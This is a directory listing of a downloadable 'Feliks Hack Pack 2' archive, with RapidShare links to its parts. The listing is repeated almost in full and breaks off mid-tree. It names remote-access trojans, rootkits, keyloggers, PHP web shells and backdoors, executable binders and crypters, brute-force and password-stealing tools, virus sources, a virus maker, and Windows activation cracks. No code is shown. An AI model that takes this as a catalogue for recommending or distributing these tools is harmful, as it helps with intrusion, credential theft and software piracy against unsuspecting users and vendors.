| | | PackUPX.dll
| | | PEiDBundle.DLL
| | | pluzina1.dll
| | | pluzina2.dll
| | | pluzina3.dll
| | | pluzina4.dll
| | | RebuildPE.dll
| | | ResView.dll
| | | SecTool.dll
| | | undef.dll
| | | unfsg_v133.dll
| | | unupolyx.dll
| | | unupx.dll
| | | UnUPX****.dll
| | | XNResourceEditor_Plugin.DLL
| | | ypp.DLL
| | | ZDRx.dll
| | |
| | \---pluginsdk
| | defs.h
| | null.c
| | NULL.dll
| |
| +---Protection ID
| | Protection_ID.exe
| |
| +---Resource Hacker
| | Dialogs.def
| | ResHacker.cnt
| | ResHacker.exe
| | ResHacker.ini
| |
| \---Restorator2007
| Restorator2007.exe
| Restorator2007.txt
|
+---FeliksPack2 - Rootkits
| advanced_loader.zip
| afxrk2k4.zip
| AFXRootkit2005.zip
| basic_loader.zip
| Chazv2.rar
| eeyebootroot.zip
| Eternity.rar
| He4Hook215b6.zip
| HideProcessHookMDL.zip
| hxdef.zip
| klister-0.4.zip
| Klog 1.0.zip
| patchfinder_w2k_2.11.zip
| rk_044.zip
| RK_SRC_040.2.zip
| SysEnterHook.zip
| vanquish-0.2.1.zip
| vice.zip
| w32root.zip
| winkit.zip
| winlogonhijack-v0.3-src.rar
|
+---FeliksPack2 - Shellz
| | 0x333openssh-3.6.1p2.tar.gz
| | 0x333openssh-3.7.1p2.tar.gz
| | 2005.rar
| | 23.php Shells.rar
| | 23_diffrent_shells.rar
| | 55k7-SWCS.rar
| | admin-ad.asp
| | adore-0.39b4.tgz
| | Babyface.rar
| | BDoor.rar
| | bind shell.txt
| | binder2.rar
| | borg.asp.txt
| | byshell063.rar
| | byshell064.rar
| | byshell067beta2&src.rar
| | c100.rar
| | c99shell.php
| | cgitelnet.tar.gz
| | chkrootkit-043.tar.gz
| | cmd.rar
| | darkspy105_en.rar
| | door.rar
| | down.rar
| | eBayId.rar
| | Eternity.rar
| | evilspy.rar
| | evilspy2.rar
| | He4Hook215b6.zip
| | hkdoor1.0.rar
| | hkshell_v1.0.rar
| | httpdoor.rar
| | hxdef084.zip
| | hxdef100.zip
| | hxdef100r.zip
| | HYTop2005.rar
| | HYTop2006.rar
| | ibf_dbbackup.sql.gz
| | icmpdoor.rar
| | icyfox007v1.10.rar
| | ironscanner.rar
| | lrk5.src.tar.gz
| | MDir.vbs
| | Mithril v1.40.rar
| | Mithril v1.45.rar
| | NetCat_New_fixed_version.rar
| | packetdoor_src.zip
| | phpdoor.rar
| | phpdoor2.0.rar
| | PhpShell.php
| | phpspy_2005.rar
| | phpspy_2006.rar
| | php_files_thief.rar
| | PortLessNew.zip
| | r57shell.rar
| | remview_2003_04_22.zip
| | rknt.zip
| | root.c
| | safe mode bypass coded by preddy.txt
| | saphpshell.rar
| | scripts 2 exe.rar
| | sendip15.rar
| | shells.rar
| | shelltools.g0t-root.rar
| | simple.p
| | sinar0.1.tar.tar
| | sk-1.3a.tar.gz
| | sk-1.3b.tar.gz
| | skeeve1.0.tar.tar
| | SSH RFI.txt
| | ssh.rar
| | tcp_backdoor.c.gz
| | uay_source.rar
| | usr.php
| | vanquish-0.2.0.zip
| | VipshellSrc.rar
| | W4-c99.php
| | wbc-v1.tar.gz
| | WebAdmin.rar
| | Webadmin2X.rar
| | webshell.php
| | webshellv001.rar
| | webshellv005.rar
| | winshell50src.zip
| | wx-01.tar.gz
| | wx.tar.tar
| | x-door[F321].rar
| | xIShell_218.zip
| | xssshellv039.zip
| | ZXshell2.0.rar
| | _root_040.zip
| |
| +---FSO's
| | casus15.php
| | CyberEye.asp
| | iMHaPFtp.php
| | indexer.asp
| | klasvayv.asp
| | phpinj.php
| | phvayv.php
| | reader.asp
| | RemExp.asp
| | Server Variables.asp
| | sincap.php
| | test.php
| | uploader.php
| |
| \---NiAi-drt
| | Antichat Shell v1.3.php
| | autorun.inf
| | Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt
| | aZRaiLPhp v1.0.php
| | bg_4.png
| | c100.txt
| | Click1.ogg
| | cmd.gif.txt
| | Copy of NiAi-drt Hack Pack password.txt
| | CrystalShell v.1.txt
| | Cyber Shell (v 1.0).php
| | d4rk-r3v-t34m.cdd
| | d4rk-r3v-t34m.exe
| | dC3 Security Crew Shell PRiV.txt
| | Dive Shell 1.0 - Emperor hacking Team.php
| | DxShell.1.0.txt
| | Elisa-Pearl days- the waves.ogg
| | exit.btn
| | fb.tar
| | Flud2Mail (F2M) 0.1.txt
| | FTp brute forcer.php
| | GFS web-shell ver 3.1.7 - PRiV8.txt
| | googlerfi+massinjector.in.perl.txt
| | h4ntu shell [powered by tsoi].php
| | High1.ogg
| | iMHaBiRLiGi PhpFtp V1.1.php
| | inDEXER And ReaDer.asp
| | ironscanner.rar
| | italia.gif
| | JspWebshell 1.2.php
| | KAdot Universal Shell v0.1.6.php
| | Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php
| | load.btn
| | LocalLinuxExploitFinder.txt
| | mad-cw.zip
| | mask.png
| | Mysql interface v1.0.txt
| | MySQL Web Interface Version 0.8.php
| | NetGaurd FTP Brute Force.php
| | NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php
| | pause.btn
| | PerlGroup.Scanner.txt
| | PHProxy.php
| | play.btn
| | Private-i3lue.php
| | ReadMe!.txt
| | Rootshell.v.1.0.txt
| | rss.rar
| | RST MySQL tools.php
| | S l a v e Z e r o IRC B0t.php
| | s72 Shell v1.1 Coding.php
| | Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
| | Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php
| | scan - K. Script v0.3 Beta By DiVaBoY.php
| | scanutil.c
| | SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php
| | Simple FTP brute by ReZEN.php
| | SimShell 1.0 - Simorgh Security MGZ.php
| | spread2.txt
| | spreader.txt
| | stop.btn
| | sulnet.txt
| | v8m.m0d.s[H]4g.txt
| | video.avi
| | VulnScan v6 Stable By Morgan.txt
| | VulnScan v7 -Final- By k1n9k0ng.rar
| | WinX Shell.php
| | ZER0CoOLs Mail BomBER.php
| |
| \---AutoPlay
| +---BiG sH3ll pack by s[H]4g
| | Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt
| | c100.txt
| | CrystalShell v.1.txt
| | dC3 Security Crew Shell PRiV.txt
| | DxShell.1.0.txt
| | GFS web-shell ver 3.1.7 - PRiV8.txt
| | Mysql interface v1.0.txt
| | Rootshell.v.1.0.txt
| | Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
| |
| +---Other t00lz
| | Flud2Mail (F2M) 0.1.txt
| | LocalLinuxExploitFinder.txt
| |
| \---Scan
| +---GoogleRFI + MassInjector in Perl
| | googlerfi+massinjector.in.perl.txt
| |
| +---PerlGroup Scanner RFI
| | PerlGroup.Scanner.txt
| |
| \---VulnScan v6 + Spread + Defacing Tool v2
| cmd.gif.txt
| spread2.txt
| spreader.txt
|
+---FeliksPack2 - THE NET TOOLS 4.5!!
| NetTools4.5.74.zip
|
+---FeliksPack2 - Trojans
| 0ptixv133.zip
| Assasinv20.zip
| bandook_v135.zip
| beast_206.zip
| beast_207.zip
| bionet4-0-5.zip
| blueeye10b.zip
| Bo2k.zip
| c-i-a-1-2-3.zip
| CFRATBETA.zip
| Char0n.zip
| cyberneticv162fix.zip
| c_yn_21.zip
| d33Pthr04t.zip
| furax_10b3.zip
| ggt23.rar
| gupt2.zip
| Hackz.rar
Hav-Rat1.3.0.zip
| illusion.zip
| invasion1.1.zip
| Latinus14(subseven gui).zip
| Leviathan10.zip
| LogansSourcecode.zip
| m0sck3r.zip
| mofotro 1.1.zip
| MofoTro1.7beta.zip
| n0kn0k72.zip
| n3t_d3v15.zip
| NetBotAtt14En.zip
| older_trojans.zip
| Omerta13.zip
| PoisonIvy2.2.0.rar
| ProRatv19.zip
| ProRat_SE_Fx18.rar
| remotedesktopspysetup4.zip
| S-H_Yahoo_Pass_Sender_1.1.zip
| senna spyworm generator.zip
| SimpleTrojan.zip
| skd2.zip
| SkDRAT2.zip
| sub7.zip
| sub7_21gold.zip
| TGA_backdoor_SP2_v2.0.zip
| th33fle_1_0.zip
| theef_210.zip
| undetec33.zip
| Webcrack.zip
| wwwhack.zip
| xHackerbasic2.1.zip
| XZTOO.zip
| X_Rat_3.3.rar
| Y3K12.zip
| y3krat2k5rc10.zip
| Yuri_V12.zip
|
+---FeliksPack2 - Tutorialz
| Beginners hacking Guide.zip
| bluetooth-hacking.pdf
| Dangerous Google - Searching For Secrets.pdf
| Hackerland.zip
| Hackers handbook.zip
| Learn Web Design.rar
| teach-yourself-perl5-in-21-days.zip
| TeachyourselfCin21days.zip
| TeachyourselfCplusplusin21days.zip
| TeachYourselfJavain21Days.zip
| TeachYourselfShellProgrammingin24Hours.zip
| visual_basic_6_black_book.zip
| Web publishing - professional reference edition.zip
| Webmasters.Guide.To.The.Wireless.Internet.pdf
|
+---FeliksPack2 - Vir Sources
| VIRS-19.ZIP
| VIRS-AD.ZIP
| VIRS-EH.ZIP
| VIRS-IL.ZIP
| VIRS-MP.ZIP
| VIRS-QU.ZIP
| VIRS-VZ.ZIP
|
+---FeliksPack2 - Virusmakerz
| TeraBIT VirMaker 2.8.zip
|
+---FeliksPack2 - Vista
| +---OEM BIOS Emulation Toolkit
| | | DIFxAPI.dll
| | | OEMTool.exe
| | | pkeys.txt
| | | readme.txt
| | | royal.inf
| | | royal.sys
| | |
| | \---CERTS
| | Acer.xrm-ms
| | ASUS.xrm-ms
| | Hewlett-Packard.xrm-ms
| | Lenovo.xrm-ms
| |
| +---Vista Activation Crack
| | pkeyconfig.xrm-ms
| | tokens.dat
| | Vista Activation Crack.txt
| |
| +---Vista Activator
| | | Install.exe
| | | TimerStop64.sys
| | |
| | \---Old
| | TimerStop.sys
| | Vista Test Crack.exe
| |
| +---Vista Activator 2007
| | Vista Activator 2007.exe
| |
| +---Vista Automated Activation Crack v3.0
| | KEYs.txt
| | Vista Automated Activation Crack v3.0.exe
| |
| +---Vista Final Crack
| | | Vista Final Crack.txt
| | |
| | \---Windows
| | +---ServiceProfiles
| | | \---NetworkService
| | | \---AppData
| | | \---Roaming
| | | \---Microsoft
| | | \---SoftwareLicensing
| | | tokens.dat
| | |
| | \---System32
| | \---Licensing
| | \---pkeyconfig
| | pkeyconfig.xrm-ms
| |
| +---VISTA KEYS
| | VISTA KEYS.txt
| |
| +---Vista Loader
| | Vista Loader.exe
| |
| +---Windows Vista Activation 1.3
| | Windows.Vista.Activation.Installer.1.3.exe
| |
| +---Windows Vista Activator
| | Windows Vista Activator.exe
| | Windows Vista KEY.txt
| |
| +---Windows Vista Activator 2
| | Windows Vista Activator 2.EXE
| |
| +---Windows Vista StopTime Crack
| | 1.bat
| | 2.bat
| | check.bat
| | Readme.txt
| | Windows Vista Crack.exe
| |
| +---x64 x32 Fix
| | \---Windows
| | +---ServiceProfiles
| | | \---NetworkService
| | | \---AppData
| | | \---Roaming
| | | \---Microsoft
| | | \---SoftwareLicensing
| | | tokens.dat
| | |
| | \---System32
| | \---Licensing
| | \---pkeyconfig
| | pkeyconfig.xrm-ms
| |
| \---XP
| | Key Finder.exe
| | OS Update Hack.exe
| | Random Serial Numbers.exe
| | RemoveWGA.exe
| | Reset.exe
| | RockXP 4.exe
| | Server 2003.exe
| | TweakNT.exe
| | WGA Fix.exe
| | Win 4 iN 1.exe
| | Win 95-2000.exe
| | Win XP Activator.exe
| | Windows 2003 & XP Anti Product Activation Crack 1.1.exe
| | Windows Xp Genuiner.exe
| | Windows XP KeyGen.exe
| | Windows XP Product ID Changer.exe
| | Windows XP-NET-2003 Product Key Changer.exe
| | WinXP Activation 1.1.exe
| | WinXP Corp. Key Changer 2.exe
| | WinXP_Validate_keys.exe
| | Xp Genuiner.reg
| | XP password Manager.exe
| | XPPID.exe
| | xpy.exe
| |
| +---Windows Admin password Hack
| | README.txt
| | Windows Admin password Hack.iso
| |
| \---Windows Update Fix
| Corp Windows Update Fix.reg
| regupdate.vbe
|
+---FeliksPack2 - Vulnerabilityes Scanners
| 950_sploit.rar
| Vulnerabilityes Scanners & Exploiters Pack v1.10.zip
| vulnerabilty.rar
|
+---FeliksPack2 - WebDownloaders
| crypticdlr.zip
| dwc.zip
| Dyn-Dv1.zip
| fedownloader_20.zip
| ftrdl.zip
| fwebd10.zip
| hookbyter.zip
| Passive Terror v1.3 Final Edition.zip
| silentassasinv20beta.zip
| skddownloader.zip
| toxic11.zip
| troll.zip
|
+---FeliksPack2 - Wirless
| abappwd.zip
| aerosol.zip
| AIO Wireless Hack Toolz.exe
| aircrack-ng-0.5.tar.gz
| aircrack.zip
| aircrackng.zip
| aircrackpack.zip
| aire.zip
| airsnort.zip
| aptools.zip
| asleap.zip
| cowpatty.zip
| EasyWifiRadar.zip
| Hotspotter-0.4.tar.gz
| kismet-2005-08-R1.tar.tar
| kismet-2006-04-R1.tar.gz
| netstumbler.zip
| Wellenreiter-v1.9.tar.gz
| weplab.zip
| wepwedgie-alpha-0.1.0.tar.gz
| wireshark-setup-0.99.5.zip
|
\---FeliksPask2 - Security Scanners
attacktoolkit.zip
legion_211.zip
NStealth-Free-5-8b103.zip
http://rapidshare.com/files/207537656/thefeliksbighackpack.zip.001.html
http://rapidshare.com/files/207538394/thefeliksbighackpack.zip.002.html
http://rapidshare.com/files/207537897/thefeliksbighackpack.zip.003.html
Feliks Hack Pack 2 AIO
+---FeliksPack2 - AIOs
| +---AIO Ip Tools
| | aio1pt00ls.rar
| |
| +---AIO password Recovery
| | Password_Recovery_Utilities_AIO.rar
| |
| +---AntiSchoolKit
| | antischoolkkit.zip
| |
| \---Tracing pack AIO
| ecartoia_pass.thijs.rar
|
+---FeliksPack2 - Binders
| 4m0kjoin3r.zip
| aase_-_crypter_binder.rar
| AFX Executable Binder PRO.zip
| aspack21.zip
| Binder v2.1.rar
| brutal.zip
| brutalforce.zip
| bytesadder.zip
| coolbind22.zip
| daecr2pub.zip
| Daemon Crypt Public v2.zip
| Deception v4.0.rar
| Deception4.zip
| EESBinder.zip
| EESBinder10.zip
| Exe Binder 07.zip
| F.B.I - Binder.rar
| freshbind.zip
| fsg_v2.zip
| interlacedbinder.zip
| M3Byter.zip
| mj17.zip
| MultiBinder_v1.4.1.zip
| newjoin.zip
| nkedb.zip
| nkedbindv10.zip
| NTPacker.zip
| NTPackerV21.zip
| Pretator v1.6.rar
| Pretator_v1.6.zip
| Redbinder_v_2.0.1.rar
| SBinder.zip
| scrambletool02.zip
| TAOD.rar
| upx.zip
| y4b_blnd.zip
|
+---FeliksPack2 - Bluetooth
| Blooover.jar
| Blooover2b.jar
| bluealert.zip
| BlueAuditor.zip
| bluescanner.zip
| BlueScannerSetup_1_1_1_0.exe
| bluesweep.zip
| bluetest.zip
| btbrowser.jar
| btbrowser.zip
| btcrack.zip
| BTExplorerPL.jar
| btscanner.zip
| EasyJackv2.jar
| freejack.jar
| ftp_bt_105.jar
| ftp_bt_106.jar
| ISeeYourFiles.jar
| MiyuX.jar
| mobiluck.jar
|
+---FeliksPack2 - Bruteforce
| 1-Attack Tool kit.zip
| 1-Crack*****2.0.zip
| brutus.zip
| Crackftp.zip
| E-mail Cracker.rar
| E-mail Cracker.zip
| FTP Brute Forcer.rar
| ftpbr.zip
| ftpbrut.zip
| hackersutility.zip
| phpbb bruteforcer.rar
| PhpBB pass extractor.zip
| phpBBcracker.rar
| ShadowScan.zip
| Webcrack.zip
| WebCrackv4.0.zip
| wwwh4ckv1946.zip
| wwwhack.zip
|
+---FeliksPack2 - Google hacking
| Alt-Google.rar
| DaGoogler.zip
| Extreme Searching Guide.txt
| Google Hacker 1.2.zip
| googler.zip
| google_hacker.zip
| GooLink.rar
| GooLink.zip
| SimpleGoogle_bin.rar
| t3chn0bra1n_z_Googler.zip
|
+---FeliksPack2 - Keyloggers
| 1-elitekeylogger.zip
| 5-BFK (Best Free Keylogger).zip
| 5-power spy.zip
| aplus.zip
| Ardamax.Keylogger.v2.8.rar
| ardamaxl.zip
| bfk.zip
| Curiosity.zip
| egf1.0b.zip
| elitek3yl0gg3r10.zip
| elitekeylogger1.0.zip
| ESK.zip
| fks20.zip
| fks_2.0.zip.zip
| GloG.rar
| Golden eye 2005.zip
| goldeneye2005setup.zip
| HermanAgent.zip
| IKlogger0.1.rar
| IKlogger0.1.rar.zip
| k3yl0g3r.zip
| keylogerSpy2006.zip
| powerspy.zip
| ProjectSatan20.zip
| rpkeylogger-0.1.zip
| skl01.zip
| SKLEditor1.0.zip
| WickeD_Keylogger 1.0.1.zip
|
+---FeliksPack2 - Links
| bg2.jpg
| the_feliks_links.html
|
+---FeliksPack2 - MSN
| 2-A-IMessengerPasswoRd.zip
| HotFreeze 1.6.zip
| icecold_reloaded freezer.zip
| MesDiscoveryLive_110155.zip
| MSN Messenger Account Cracker v2.0.zip
| MSN Monitor & Sniffer.zip
| msnexte3.zip
| mspass.zip
| NetPass.zip
| nudgemadness.zip
| WWH Flooder 2.0.zip
|
+---FeliksPack2 - Nukers
| b4ttl3p0ng.zip
| fortune.zip
| inf3rn0_nk.zip
| meliskah25.zip
| nuk3it.zip
| PM2.zip
| RocketV1_0.zip
| Sphinx20.zip
| Superkod.zip
| Winsmurf.zip
|
+---FeliksPack2 - Otherz
| CeedoInstaller.exe
| pebuilder3110a.exe
|
+---FeliksPack2 - Passwd crackers
| 2-Advanced archive password recovery.zip
| 3-A-PDF-PRP.ZIP
| 3-AOfficePasswordRecovery.zip
| 3-PDF password Remover v2.2.zip
| apocalypso.zip
| hydra-4.6-src.tar.tar
| john-17w.zip
| md5_cracker.rar
| mdcrack-1.2.tar.tar
| rainbowcrack-1.2-win.zip
| Ultra Zip password Cracker.zip
|
+---FeliksPack2 - PHP Shells
| BackDooR (fr).rar
| c99last.tar.gz
| Defacing Tool Pro v2.5.rar
| nstviewshell.rar
| PHP Backdoor v1.rar
| PHP_BackDoor_v1.5.rar
| PHP_Shell_v1.7.rar
| r57shell.rar
| Simple_PHP_BackDooR.rar
|
+---FeliksPack2 - Portable Notepads
| beauty.exe
| DIPRO32.EXE
| gsnote3.exe
| htmlpad.exe
| metapad.exe
| notepad++.exe
|
+---FeliksPack2 - Portscanners
| 1-SuperScan 2.06.zip
| 1-SuperScan 4.zip
| 134_superscan4.zip
| angryipscan.zip
| aolip.zip
| bitchinthreads.zip
| blue.zip
| bluesprtscn.zip
| CGI Founder v1.043.zip
| cgis4.zip
| CGISscan.zip
| domainscanv1_0or.zip
| lanspy.zip
| Legion NetBios Scanner v2.1.zip
| MooreR Port Scanner.rar
| neotrc325.zip
| NetBIOS Name Scanner.rar
| netscantools4or.zip
| nmap-4.03.tar.bz2
| nts.zip
| ProPort.zip
| Stealth - HTTP Scanner v1.0 build 23.zip
| sup3rsc4n.zip
| super.zip
| superscan4.zip
| TrojanHunter15.zip
| wasp.zip
|
+---FeliksPack2 - Rapid
| Rapid.rar
|
+---FeliksPack2 - ReMade
| +---AC
| | \---ACStripper
| | ACRebuilder.exe
| | ACStripper.exe
| |
| +---AS
| | +---ASPackDie
| | | ASPackDie.exe
| | | ForceLibrary.dll
| | |
| | \---AStripper
| | Engine.sys
| | Stripper X.exe
| |
| +---DBPE
| | \---DBPE Unpacker
| | DBPE Unpacker.exe
| |
| +---FSG
| | \---UnFSG
| | FSG Dumper.exe
| | UnFSG.exe
| |
| +---MEW
| | \---UnMEW
| | UnMEW.exe
| |
| +---PE
| | +---PESpin
| | | PESpin.EXE
| | |
| | +---UnPECompact
| | | Realign.dll
| | | rebIT.dll
| | | UnPECompact 2.EXE
| | | UnPECompact.exe
| | |
| | \---unPEncrypt
| | unPEncrypt.exe
| |
| +---PEiD
| | | external.txt
| | | IDToText.Ini
| | | PEiD.exe
| | | userdb.txt
| | |
| | +---plugins
| | | AddSig.DLL
| | | ExtOverlay.dll
| | | FC.DLL
| | | FixCrc.dll
| | | GenOEP.dll
| | | IDToText.DLL
| | | ImpREC.dll
| | | kanal.dll
| | | Morphine.dll
| | | PackUPX.dll
| | | PEiDBundle.DLL
| | | pluzina1.dll
| | | pluzina2.dll
| | | pluzina3.dll
| | | pluzina4.dll
| | | RebuildPE.dll
| | | ResView.dll
| | | SecTool.dll
| | | undef.dll
| | | unfsg_v133.dll
| | | unupolyx.dll
| | | unupx.dll
| | | UnUPX****.dll
| | | XNResourceEditor_Plugin.DLL
| | | ypp.DLL
| | | ZDRx.dll
| | |
| | \---pluginsdk
| | defs.h
| | null.c
| | NULL.dll
| |
| +---Protection ID
| | Protection_ID.exe
| |
| +---Resource Hacker
| | Dialogs.def
| | ResHacker.cnt
| | ResHacker.exe
| | ResHacker.ini
| |
| \---Restorator2007
| Restorator2007.exe
| Restorator2007.txt
|
+---FeliksPack2 - Rootkits
| advanced_loader.zip
| afxrk2k4.zip
| AFXRootkit2005.zip
| basic_loader.zip
| Chazv2.rar
| eeyebootroot.zip
| Eternity.rar
| He4Hook215b6.zip
| HideProcessHookMDL.zip
| hxdef.zip
| klister-0.4.zip
| Klog 1.0.zip
| patchfinder_w2k_2.11.zip
| rk_044.zip
| RK_SRC_040.2.zip
| SysEnterHook.zip
| vanquish-0.2.1.zip
| vice.zip
| w32root.zip
| winkit.zip
| winlogonhijack-v0.3-src.rar
|
+---FeliksPack2 - Shellz
| | 0x333openssh-3.6.1p2.tar.gz
| | 0x333openssh-3.7.1p2.tar.gz
| | 2005.rar
| | 23.php Shells.rar
| | 23_diffrent_shells.rar
| | 55k7-SWCS.rar
| | admin-ad.asp
| | adore-0.39b4.tgz
| | Babyface.rar
| | BDoor.rar
| | bind shell.txt
| | binder2.rar
| | borg.asp.txt
| | byshell063.rar
| | byshell064.rar
| | byshell067beta2&src.rar
| | c100.rar
| | c99shell.php
| | cgitelnet.tar.gz
| | chkrootkit-043.tar.gz
| | cmd.rar
| | darkspy105_en.rar
| | door.rar
| | down.rar
| | eBayId.rar
| | Eternity.rar
| | evilspy.rar
| | evilspy2.rar
| | He4Hook215b6.zip
| | hkdoor1.0.rar
| | hkshell_v1.0.rar
| | httpdoor.rar
| | hxdef084.zip
| | hxdef100.zip
| | hxdef100r.zip
| | HYTop2005.rar
| | HYTop2006.rar
| | ibf_dbbackup.sql.gz
| | icmpdoor.rar
| | icyfox007v1.10.rar
| | ironscanner.rar
| | lrk5.src.tar.gz
| | MDir.vbs
| | Mithril v1.40.rar
| | Mithril v1.45.rar
| | NetCat_New_fixed_version.rar
| | packetdoor_src.zip
| | phpdoor.rar
| | phpdoor2.0.rar
| | PhpShell.php
| | phpspy_2005.rar
| | phpspy_2006.rar
| | php_files_thief.rar
| | PortLessNew.zip
| | r57shell.rar
| | remview_2003_04_22.zip
| | rknt.zip
| | root.c
| | safe mode bypass coded by preddy.txt
| | saphpshell.rar
| | scripts 2 exe.rar
| | sendip15.rar
| | shells.rar
| | shelltools.g0t-root.rar
| | simple.p
| | sinar0.1.tar.tar
| | sk-1.3a.tar.gz
| | sk-1.3b.tar.gz
| | skeeve1.0.tar.tar
| | SSH RFI.txt
| | ssh.rar
| | tcp_backdoor.c.gz
| | uay_source.rar
| | usr.php
| | vanquish-0.2.0.zip
| | VipshellSrc.rar
| | W4-c99.php
| | wbc-v1.tar.gz
| | WebAdmin.rar
| | Webadmin2X.rar
| | webshell.php
| | webshellv001.rar
| | webshellv005.rar
| | winshell50src.zip
| | wx-01.tar.gz
| | wx.tar.tar
| | x-door[F321].rar
| | xIShell_218.zip
| | xssshellv039.zip
| | ZXshell2.0.rar
| | _root_040.zip
| |
| +---FSO's
| | casus15.php
| | CyberEye.asp
| | iMHaPFtp.php
| | indexer.asp
| | klasvayv.asp
| | phpinj.php
| | phvayv.php
| | reader.asp
| | RemExp.asp
| | Server Variables.asp
| | sincap.php
| | test.php
| | uploader.php
| |
| \---NiAi-drt
| | Antichat Shell v1.3.php
| | autorun.inf
| | Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt
| | aZRaiLPhp v1.0.php
| | bg_4.png
| | c100.txt
| | Click1.ogg
| | cmd.gif.txt
| | Copy of NiAi-drt Hack Pack password.txt
| | CrystalShell v.1.txt
| | Cyber Shell (v 1.0).php
| | d4rk-r3v-t34m.cdd
| | d4rk-r3v-t34m.exe
| | dC3 Security Crew Shell PRiV.txt
| | Dive Shell 1.0 - Emperor hacking Team.php
| | DxShell.1.0.txt
| | Elisa-Pearl days- the waves.ogg
| | exit.btn
| | fb.tar
| | Flud2Mail (F2M) 0.1.txt
| | FTp brute forcer.php
| | GFS web-shell ver 3.1.7 - PRiV8.txt
| | googlerfi+massinjector.in.perl.txt
| | h4ntu shell [powered by tsoi].php
| | High1.ogg
| | iMHaBiRLiGi PhpFtp V1.1.php
| | inDEXER And ReaDer.asp
| | ironscanner.rar
| | italia.gif
| | JspWebshell 1.2.php
| | KAdot Universal Shell v0.1.6.php
| | Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php
| | load.btn
| | LocalLinuxExploitFinder.txt
| | mad-cw.zip
| | mask.png
| | Mysql interface v1.0.txt
| | MySQL Web Interface Version 0.8.php
| | NetGaurd FTP Brute Force.php
| | NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php
| | pause.btn
| | PerlGroup.Scanner.txt
| | PHProxy.php
| | play.btn
| | Private-i3lue.php
| | ReadMe!.txt
| | Rootshell.v.1.0.txt
| | rss.rar
| | RST MySQL tools.php
| | S l a v e Z e r o IRC B0t.php
| | s72 Shell v1.1 Coding.php
| | Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
| | Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php
| | scan - K. Script v0.3 Beta By DiVaBoY.php
| | scanutil.c
| | SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php
| | Simple FTP brute by ReZEN.php
| | SimShell 1.0 - Simorgh Security MGZ.php
| | spread2.txt
| | spreader.txt
| | stop.btn
| | sulnet.txt
| | v8m.m0d.s[H]4g.txt
| | video.avi
| | VulnScan v6 Stable By Morgan.txt
| | VulnScan v7 -Final- By k1n9k0ng.rar
| | WinX Shell.php
| | ZER0CoOLs Mail BomBER.php
| |
| \---AutoPlay
| +---BiG sH3ll pack by s[H]4g
| | Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt
| | c100.txt
| | CrystalShell v.1.txt
| | dC3 Security Crew Shell PRiV.txt
| | DxShell.1.0.txt
| | GFS web-shell ver 3.1.7 - PRiV8.txt
| | Mysql interface v1.0.txt
| | Rootshell.v.1.0.txt
| | Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
| |
| +---Other t00lz
| | Flud2Mail (F2M) 0.1.txt
| | LocalLinuxExploitFinder.txt
| |
| \---Scan
| +---GoogleRFI + MassInjector in Perl
| | googlerfi+massinjector.in.perl.txt
| |
| +---PerlGroup Scanner RFI
| | PerlGroup.Scanner.txt
| |
| \---VulnScan v6 + Spread + Defacing Tool v2
| cmd.gif.txt
| spread2.txt
| spreader.txt
|
+---FeliksPack2 - THE NET TOOLS 4.5!!
| NetTools4.5.74.zip
|
+---FeliksPack2 - Trojans
| 0ptixv133.zip
| Assasinv20.zip
| bandook_v135.zip
| beast_206.zip
| beast_207.zip
| bionet4-0-5.zip
| blueeye10b.zip
| Bo2k.zip
| c-i-a-1-2-3.zip
| CFRATBETA.zip
| Char0n.zip
| cyberneticv162fix.zip
| c_yn_21.zip
| d33Pthr04t.zip
| furax_10b3.zip
| ggt23.rar
| gupt2.zip
| Hackz.rar
Hav-Rat1.3.0.zip
| illusion.zip
| invasion1.1.zip
| Latinus14(subseven gui).zip
| Leviathan10.zip
| LogansSourcecode.zip
| m0sck3r.zip
| mofotro 1.1.zip
| MofoTro1.7beta.zip
| n0kn0k72.zip
| n3t_d3v15.zip
| NetBotAtt14En.zip
| older_trojans.zip
| Omerta13.zip
| PoisonIvy2.2.0.rar
| ProRatv19.zip
| ProRat_SE_Fx18.rar
| remotedesktopspysetup4.zip
| S-H_Yahoo_Pass_Sender_1.1.zip
| senna spyworm generator.zip
| SimpleTrojan.zip
| skd2.zip
| SkDRAT2.zip
| sub7.zip
| sub7_21gold.zip
| TGA_backdoor_SP2_v2.0.zip
| th33fle_1_0.zip
| theef_210.zip
| undetec33.zip
| Webcrack.zip
| wwwhack.zip
| xHackerbasic2.1.zip
| XZTOO.zip
| X_Rat_3.3.rar
| Y3K12.zip
| y3krat2k5rc10.zip
| Yuri_V12.zip
|
+---FeliksPack2 - Tutorialz
| Beginners hacking Guide.zip
| bluetooth-hacking.pdf
| Dangerous Google - Searching For Secrets.pdf
| Hackerland.zip
| Hackers handbook.zip
| Learn Web Design.rar
| teach-yourself-perl5-in-21-days.zip
| TeachyourselfCin21days.zip
| TeachyourselfCplusplusin21days.zip
| TeachYourselfJavain21Days.zip
| TeachYourselfShellProgrammingin24Hours.zip
| visual_basic_6_black_book.zip
| Web publishing - professional reference edition.zip
| Webmasters.Guide.To.The.Wireless.Internet.pdf
|
+---FeliksPack2 - Vir Sources
| VIRS-19.ZIP
| VIRS-AD.ZIP
| VIRS-EH.ZIP
| VIRS-IL.ZIP
| VIRS-MP.ZIP
| VIRS-QU.ZIP
| VIRS-VZ.ZIP
|
+---FeliksPack2 - Virusmakerz
| TeraBIT VirMaker 2.8.zip
|
+---FeliksPack2 - Vista
| +---OEM BIOS Emulation Toolkit
| | | DIFxAPI.dll
| | | OEMTool.exe
| | | pkeys.txt
| | | readme.txt
| | | royal.inf
| | | royal.sys
| | |
| | \---CERTS
| | Acer.xrm-ms
| | ASUS.xrm-ms
| | Hewlett-Packard.xrm-ms
| | Lenovo.xrm-ms
| |
| +---Vista Activation Crack
| | pkeyconfig.xrm-ms
| | tokens.dat
| | Vista Activation Crack.txt
| |
| +---Vista Activator
